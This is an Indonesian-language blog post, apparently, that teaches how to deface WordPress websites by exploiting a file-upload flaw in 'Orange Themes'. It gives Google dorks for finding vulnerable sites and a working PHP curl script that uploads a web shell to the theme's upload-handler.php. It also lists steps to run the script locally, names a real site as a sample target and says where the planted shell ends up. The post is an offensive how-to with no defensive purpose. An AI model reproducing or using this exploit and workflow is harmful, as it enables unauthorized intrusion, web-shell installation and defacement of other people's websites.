Tutorial Deface Dengan Exploit Orange - Kembali gue berbicara tentang deface website kali ini gue sharing deface website menggunakan exploit orange themes dari exploit-db.com dan untuk tutorial kali ini memang agak rumit dari yang lainnya seperti posting gue kemaren "cara deface site dengan tehnik com_user" semuanya mudah kalau lu sendiri sudah terbiasa makan yang namanya kode php html javascript semua ini bisa dilakukan dengan kalem dan santai tentunya dan jangan lupa siapkan kopi rokok nya buat mantengin tutorial.
Sebelumnya melanjutnya ke tutorial alangkah baiknya membaca artikel ini dari awal sampai habis supaya lu gak bingung ngikutinnya nah kali ini kita akan mencari bug/celah pada website yang memiliki CMS berbasis Wordpress dan kita akan menemukan pesan error pada web yang kita injeksi nah disini gak semua web vuln jadi harus sabar bray inget gak ada yang instant. nah berbeda dengan posting gue kemaren " cara deface web dengan havij " yang mencari bug melalui fungsi sting ' kali ini berbeda oke mari simak ke tutorial berikut :
Nah Perlu diperhatikan http://target.com/ Nanti akan diganti dengan target website yang vuln tersebut dan gantengersshell.php silahkan ganti dengan nama shell bejak yang kamu download tadi misal "gantengersshell.php" ingat harus .php kalau belum ya ubah dulu oke next tutorial
Download Dan Simpen Dulu Bahan-Bahannya
- Shell Bejak (untuk yang belum punya shell)
- Xammp (pilih yang sesuai sama spesifik laptop komputer lu) cara nya lihat disini
- Google Dork
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
- Exploit Orange Themes
<?php
$uploadfile="gantengersshell.php";
$ch = curl_init("http://target.com/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Nah Perlu diperhatikan http://target.com/ Nanti akan diganti dengan target website yang vuln tersebut dan gantengersshell.php silahkan ganti dengan nama shell bejak yang kamu download tadi misal "gantengersshell.php" ingat harus .php kalau belum ya ubah dulu oke next tutorial
Tutorial Deface Dengan Exploit Orange Themes File Upload
- Cari target pake google dork diatas contoh gue ambil inurl:"/wp-content/themes/bulteno-theme/" nah gue dapet "http://paisleygates.com/wp-content/themes/bulteno-theme/" sekarang kita tambahin url dengan "/functions/upload-handler.php" jadinya "http://paisleygates.com/wp-content/themes/bulteno-theme/functions/upload-handler.php"
- Sudah itu kembali ke atas lagi copy exploit orange themes paste ke notepad save ke folder directory Local Disk C:/xampp/php jangan lupa save dengan extensi .php jangan lupa ganti text document menjadi all files contoh exploit.php
- Sesudah itu buka shell hasil download tadi dan copy shell nya paste ke notepad save dengan extesi .php ke dalam directory Local Disk C:/xampp/php juga contoh gantengersshell.php jangan lupa ganti text document menjadi all files lalu save
- Kalau semua itu sudah dilakukan sekarang buka exploit nya yang di directory C:/xampp/php>exploit.php nah buka exploit.php ganti target.com menjadi taget yang kamu dapatkan dari hasil dorking diatas lalu save
- buka xammp nya seperti dibawah lalu klik start hanya pada appache
- Kalau sudah sekarang buka CMD dengan cara windows + r lalu ketik CMD lalu tekan enter lalu ketik cd\xampp/php terus ketik lagi php exploit.php enter dan jika keluar nama shellnya seperti gantengersshell.php berarti berhasil bray kalo gak keluar apa-apa cari lagi deh target lainnya
- untuk mengetahui letak shellnya lihat http://target.com/wpcontent/uploads/2013/11/namashelllu.php
- selesai selamat bekerja
0 Komentar untuk "Tutorial Deface Website Dengan Exploit Orange Themes File Upload"